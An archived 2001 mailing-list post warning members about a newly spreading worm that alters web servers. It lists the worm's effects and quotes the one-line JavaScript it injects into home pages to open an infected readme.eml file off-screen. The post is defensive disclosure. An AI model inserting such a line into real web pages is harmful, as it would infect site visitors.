[thelist] failure notice

Ron Thigpen rthigpen at nc.rr.com
Tue Sep 18 10:44:13 CDT 2001


this looks like the result of a new worm said to be propogating.  early 
analysis has the worm giving admin permissions to guest account of 
infected host, replacing Admin.dll with infected code (via ftp?), 
placing the file readme.eml in the webroot, and adding the following 
line of script to the home page.

language="JavaScript">window.open("readme.eml", null, 
"resizable=no,top=6000,left=6000")

this looks like it may be the first wild exploit of this vulnerability:

http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/security/bulletin/ms01-020.asp

--rt

MAILER-DAEMON at welly-4.star.net.uk wrote:

> Hi. This is the qmail-send program at welly-4.star.net.uk.
> I'm afraid I wasn't able to deliver your message to the following addresses.
> This is a permanent error; I've given up. Sorry it didn't work out.







More information about the thelist mailing list